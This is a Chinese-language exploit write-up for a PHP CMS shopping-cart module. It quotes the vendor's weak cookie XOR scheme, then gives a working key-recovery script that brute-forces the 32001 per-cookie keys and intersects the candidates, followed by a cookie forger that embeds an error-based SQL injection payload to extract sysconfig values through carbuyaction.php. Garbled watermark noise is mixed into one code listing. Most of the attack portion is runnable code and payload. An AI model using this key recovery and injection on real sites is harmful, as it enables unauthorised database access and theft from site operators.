www.xxx.com/plus/search.php?keyword=
在 include/shopcar.class.php 中，先看一下 shopcar 类是如何生成 cookie 的：
// include/shopcar.class.php, lines 239-250 (quoted from the vulnerable version).
/**
 * Persist one shopping-cart value in a client-side cookie.
 *
 * Arrays are first flattened by enCode() (a=yy&b=cc style, per the write-up),
 * then everything goes through enCrypt().  No separate integrity check (MAC)
 * is applied here, so enCrypt() is all that stands between the client and a
 * value the server will later trust.
 *
 * @param string $key   cookie name
 * @param mixed  $value array or scalar payload
 * @return void
 */
function saveCookie($key, $value)
{
    $payload = is_array($value) ? $this->enCode($value) : $value;
    // 36000 s = 10 h lifetime, site-wide path.
    setcookie($key, $this->enCrypt($payload), time() + 36000, '/');
}
简单地说，$key 就是 cookie 的名字，$value 就是 cookie 的值；enCode 的作用是把数组转换成 a=yy&b=cc&d=know 这样的串。关键在于 enCrypt 函数：
// include/shopcar.class.php, lines 186-198 (quoted from the vulnerable version).
/**
 * "Encrypt" a cookie value.
 *
 * The weakness this write-up exploits is all here: the per-call key is
 * md5(rand(0, 32000)), so there are only 32001 possible keys, and each key
 * character is written into the output right next to the plaintext byte it
 * XORs.  The buffer is then XORed once more by setKey() with the site-wide
 * key and base64-encoded.
 *
 * @param string $txt plaintext (enCode() output or a scalar)
 * @return string base64( setKey( k0.(t0^k0) . k1.(t1^k1) . ... ) )
 */
function enCrypt($txt)
{
    srand((double)microtime() * 1000000);     // clock-seeded
    $perCallKey = md5(rand(0, 32000));         // 32 hex chars, at most 32001 distinct values
    $keyLen = strlen($perCallKey);
    $n = strlen($txt);
    $interleaved = '';
    for ($i = 0; $i < $n; $i++) {
        $k = $perCallKey[$i % $keyLen];        // key cycles every 32 bytes
        $interleaved .= $k . ($txt[$i] ^ $k);  // key byte, then masked byte
    }
    return base64_encode($this->setKey($interleaved));
}
// include/shopcar.class.php, lines 213-225 (quoted from the vulnerable version).
/**
 * XOR $txt with the site-wide cookie key, cycling every 32 bytes.
 *
 * The key is md5(strtolower($cfg_cookie_encode)) - 32 lowercase hex chars.
 * Applying the function twice restores the input (plain XOR).  This key is
 * the only secret in the scheme; once a client knows it (the script further
 * down recovers it from two captured cookies) any cart cookie can be forged.
 *
 * @param string $txt input bytes
 * @return string XORed bytes, same length as $txt
 */
function setKey($txt)
{
    global $cfg_cookie_encode;
    $siteKey = md5(strtolower($cfg_cookie_encode));
    $keyLen = strlen($siteKey);
    $n = strlen($txt);
    $out = '';
    for ($i = 0; $i < $n; $i++) {
        $out .= $txt[$i] ^ $siteKey[$i % $keyLen];
    }
    return $out;
}
enCrypt 的参数 $txt 我们是可知的（就是购物车明文，可以根据页面推算出来），返回值就是 cookie 的值，这个我们也是可知的（直接从浏览器里拿）。
然后到了 enCrypt 调用 setKey 时的参数 $tmp。这个参数在某种意义上我们也是可知的：因为 $encrypt_key = md5(rand(0, 32000)) 只有 32001 种可能（rand 的上下界都包含在内），我们可以枚举出这 32001 种可能的 $tmp，从而推出 32001 种可能的 md5(strtolower($cfg_cookie_encode))。补充一下，我们的目的是推出 setKey 中 $encrypt_key 的值，有了它才能任意构造购物车的 cookie。在这些候选 key 里，先简单地过滤掉含有非字母数字字符的（真正的 key 是 md5 的输出，只会是 32 位小写十六进制，所以还可以过滤得更严），就只剩下几百个可能的 key；然后再下一次订单，又得到几百个候选 key，两者取交集，就得到最终的 key。
具体代码如下:
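<?php
// Key-recovery script for the shopcar cookie scheme quoted above.
// Inputs (edit these three):
//   $cookie1, $cookie2 - two cart cookies captured from the browser for the
//                        SAME cart line.  Each is enCrypt() output; as a sanity
//                        check, base64_decode() of each must be exactly
//                        2 * strlen($plantxt) bytes, because enCrypt() writes one
//                        key byte next to every plaintext byte.
//   $plantxt           - the enCode() output for that cart line, reconstructed
//                        from the page (format shown below the script).
$cookie1 = "X2lRPFNlCmlWc1cvAHNXMABjAToHbVcyB3ZXJFIwA20LIAlzU2ULPARyAmQGIVU5VyJbfFVsBiYNN1dsUG0DIl90UTFTLAo3VjBXYgBvVzgAZAEqBz9XagclVzBSbw=="; // first cookie, change here
$cookie2 = "ADYCb1RiBmUDJghwUyAFYlIxW2BROwhtVCUIe1AyC2UOJVMpADYBNgJ0AmRUcw5iAncAJ1JrCSlQalBrAj8CIwArAmJUKwY7A2UIPVM8BWpSNltwUWkINVR2CG9QbQ=="; // second cookie, change here
$plantxt = "id=2&price=0&units=fun&buynum=1&title=naduohua1"; // the plaintext, change here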
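/**
 * Recover a 32-byte candidate of the site-wide key from one cookie.
 *
 * enCrypt() returns base64(setKey(T)), and setKey() XORs T with the 32-char
 * key md5(strtolower($cfg_cookie_encode)), restarting at offset 0 every 32
 * bytes.  Hence decode(cookie)[i] XOR T[i] for i = 0..31 is the key itself -
 * provided $string really is T, i.e. the caller guessed enCrypt()'s
 * per-cookie key correctly.
 *
 * @param string $code   base64 cookie value
 * @param string $string candidate interleaved buffer T (>= 32 bytes)
 * @return string 32-byte key candidate, or '' when either input is too short
 *                (or $code does not decode) to yield a full key
 */
function reStrCode($code, $string)
{
    $cipher = base64_decode($code);
    // Reading past the end of either buffer used to emit warnings and return a
    // truncated string that could never be the key; bail out explicitly instead.
    if ($cipher === false || strlen($cipher) < 32 || strlen($string) < 32) {
        return '';
    }
    // PHP's string ^ is byte-wise over the common length: exactly the old loop.
    return substr($string, 0, 32) ^ substr($cipher, 0, 32);
}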
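/**
 * Enumerate every per-cookie key enCrypt() could have drawn and, for each,
 * the site-wide setKey() key that would have produced $cookie from $plantxt.
 *
 * enCrypt() takes its key from rand(0, 32000): 32001 candidates, 0 and 32000
 * both inclusive.  For guess j the first 32 bytes of the interleaved buffer T
 * are rebuilt exactly as enCrypt() builds them (key byte, then plaintext byte
 * XOR key byte) and XORed against the first 32 decoded cookie bytes; because
 * setKey() cycles its 32-char key from offset 0, that XOR is the key itself
 * when the guess is right (the same arithmetic reStrCode() performs).  The
 * real key is md5() output - 32 lowercase hex chars - so only candidates of
 * that shape are kept.  The write-up reports a few hundred survivors per
 * cookie; intersecting two cookies (bottom of the script) removes the rest.
 *
 * @param string $cookie  base64 cookie value as captured from the browser
 * @param string $plantxt enCode() plaintext for that cart line (>= 16 chars)
 * @return string[] candidate 32-char keys, in guess order (may repeat)
 */
function getKeys($cookie, $plantxt)
{
    $results = array();
    $cipher = base64_decode($cookie);
    $len = strlen($plantxt);
    // Only T[0..31] is compared, i.e. the first 16 plaintext chars (2 bytes
    // of T each); anything shorter cannot yield a full 32-byte key.
    if ($cipher === false || strlen($cipher) < 32 || $len < 16) {
        return $results;
    }
    $cipherHead = substr($cipher, 0, 32);   // decoded once, not once per guess
    // rand(0, 32000) is inclusive on both ends, so the loop must reach 32000.
    for ($j = 0; $j <= 32000; $j++) {
        $guess = md5($j);
        $head = '';
        for ($i = 0; $i < 16; $i++) {
            $k = $guess[$i];                 // i < 32: no wrap-around within the first 16 chars
            $head .= $k . ($plantxt[$i] ^ $k);
        }
        $candidate = $head ^ $cipherHead;    // byte-wise string XOR, both sides 32 bytes
        if (preg_match('/\A[0-9a-f]{32}\z/', $candidate)) {
            echo $candidate . "\n";
            $results[] = $candidate;
        }
    }
    return $results;
}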
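// Each cookie yields a candidate set that contains the true site key plus a
// few survivors of wrong guesses.  The two cookies were produced with
// independent random per-cookie keys, so those survivors differ between them
// and the intersection is, with high probability, just the real key.  If more
// than one key survives, repeat with a third cookie.
$results1 = getKeys($cookie1, $plantxt);
$results2 = getKeys($cookie2, $plantxt);
print "\n——————–real key————————–\n";
// array_intersect compares as strings (no loose ==) and replaces the O(n*m)
// nested loop; array_unique stops a repeated candidate from printing twice.
$realKeys = array_unique(array_intersect($results1, $results2));
if (count($realKeys) === 0) {
    echo "no common key - check \$plantxt against the page and that both cookies are for the same cart line\n";
}
foreach ($realKeys as $realKey) {
    echo $realKey . "\n";
}
?>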
$cookie1 和 $cookie2 是我下了两次订单后分别生成的两个 cookie，两次对应的明文必须相同，否则无法取交集；$plantxt 可以根据页面自己推算，大概就是这个格式：id=2&price=0&units=fun&buynum=1&title=naduohua1
运行脚本就能推算出 md5(strtolower($cfg_cookie_encode))。得到这个 key 之后，我们就可以构造任意内容的购物车 cookie。
接着看
2 w& [1 Y/ H+ }0 }0 H/ g+ T/ i20 class MemberShops
, E: |; t1 T& j% F( Y- u, a21 {+ m4 U9 W5 F: T5 c
22 var $OrdersId;4 [: D8 F' b4 X9 _) a" q3 x
23 var $productsId;
0 V& ]8 _2 p4 L/ |/ }24& a( a1 p5 g, \( o: R4 y/ y6 {! N
/**
 * MemberShops constructor (include/shopcar.class.php lines 25-32).
 *
 * The order id is taken straight from the "OrdersId" cookie - i.e. from
 * whoever can produce a cookie the site accepts - and is only minted
 * server-side when that cookie is empty.  getCookie() is not shown in the
 * write-up; presumably it reverses enCrypt() (TODO confirm in the full class).
 */
function __construct()
{
    $this->OrdersId = $this->getCookie("OrdersId");
    if (!empty($this->OrdersId)) {
        return;
    }
    $this->OrdersId = $this->MakeOrders();
}
可以看到 OrdersId 是直接从 cookie 里取出来的，只有 cookie 为空时才由 MakeOrders() 生成新的订单号。
然后看 /plus/carbuyaction.php 中的：
// plus/carbuyaction.php, lines 29, 39 and 173 (everything in between omitted, as in the write-up).
$cart = new MemberShops();
$OrdersId = $cart->OrdersId; // order id for this request - read from the cookie in MemberShops::__construct()
// ... lines 40-172 omitted ...
// $OrdersId is interpolated straight into the statement; nothing in what the
// write-up shows validates or escapes it between the cookie read and here.
$sql = "SELECT `oid` FROM #@__shops_orders WHERE oid='$OrdersId' LIMIT 0,1";
$rows = $dsql->GetOne($sql);
$OrdersId 在上面展示的代码里未经任何校验就被拼进了 SQL 语句，接着我们就可以注入了。
用下面的代码生成注入用的 OrdersId cookie（把 $encrypt_key 换成上一步推出的 key）：
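<?php
// Cookie forger for the injection step.  $txt becomes the OrdersId cookie
// value: MemberShops::__construct() reads it back and carbuyaction.php (line
// 173 in the listing above) drops it unescaped into
//   SELECT `oid` FROM #@__shops_orders WHERE oid='$OrdersId' LIMIT 0,1
// so the payload closes that quote and injects.  `#@__` is the same table-prefix
// placeholder the vendor query uses.  The subquery is the usual error-based
// extraction (count(*) + GROUP BY on concat(floor(rand(0)*2), ...)), which makes
// the selected substring of #@__sysconfig (aid=3) surface in the SQL error.
// "\'" is not an escape inside a double-quoted PHP string, so the backslashes
// reach MySQL literally; they are reproduced here exactly as published.
$txt = "1' or 1=@`\'` and (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((select value from #@__sysconfig where aid=3),1,62)))a from information_schema.tables group by a)b) or 1=@`\'` or '1'='1";
// md5(strtolower($cfg_cookie_encode)) as recovered by the previous script: 32 lowercase hex chars.
$encrypt_key = "9f09293b7419ed68448fb51d5b174834"; // here is the key, please change here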
/**
 * Replica of shopcar's setKey(): XOR with the already-computed site key.
 *
 * Unlike the vendor version this reads the final md5 string from the global
 * $encrypt_key (set at the top of the script) instead of deriving it from
 * $cfg_cookie_encode.  Behaviour is otherwise identical, key cycling included.
 *
 * @param string $txt input bytes
 * @return string XORed bytes, same length as $txt
 */
function setKey($txt)
{
    global $encrypt_key;
    $keyLen = strlen($encrypt_key);
    $n = strlen($txt);
    $pos = 0;
    $out = '';
    for ($i = 0; $i < $n; $i++) {
        if ($pos == $keyLen) {
            $pos = 0;       // wrap around to the start of the key
        }
        $out .= $txt[$i] ^ $encrypt_key[$pos];
        $pos++;
    }
    return $out;
}
/**
 * Replica of shopcar's enCrypt(), calling the script-level setKey() above.
 *
 * The $encrypt_key assigned here is a local (there is no `global` statement),
 * so it shadows, and does not touch, the global $encrypt_key that setKey()
 * reads.  Every call draws a fresh random per-cookie key, so the output
 * differs from call to call even for the same $txt.
 *
 * @param string $txt plaintext
 * @return string base64 cookie value
 */
function enCrypt($txt)
{
    srand((double)microtime() * 1000000);
    $encrypt_key = md5(rand(0, 32000));
    $keyLen = strlen($encrypt_key);
    $n = strlen($txt);
    $interleaved = '';
    for ($i = 0; $i < $n; $i++) {
        $k = $encrypt_key[$i % $keyLen];
        $interleaved .= $k . ($txt[$i] ^ $k);
    }
    return base64_encode(setKey($interleaved));
}
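// enCrypt() uses a fresh random key per call, so simply call it again until
// the base64 contains no '+'.  The write-up does not say why '+' is avoided;
// presumably because cookie values are URL-decoded on the server and a '+'
// would come back as a space - TODO confirm against getCookie().
$dest = '';
$found = false;
for ($attempt = 0; $attempt < 100000 && !$found; $attempt++) {
    $dest = enCrypt($txt);
    // strpos() returns 0 for a '+' at offset 0; the original `!strpos()` read
    // that as "no plus" and could emit a value starting with '+'.
    $found = strpos($dest, '+') === false;
}
if (!$found) {
    fwrite(STDERR, "gave up after 100000 attempts: every value contained '+'\n");
    exit(1);
}
echo $dest . "\n";
?>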
7 Y) x n8 n! v2 A
; n, [( {8 s m- d, a; Q5 Y |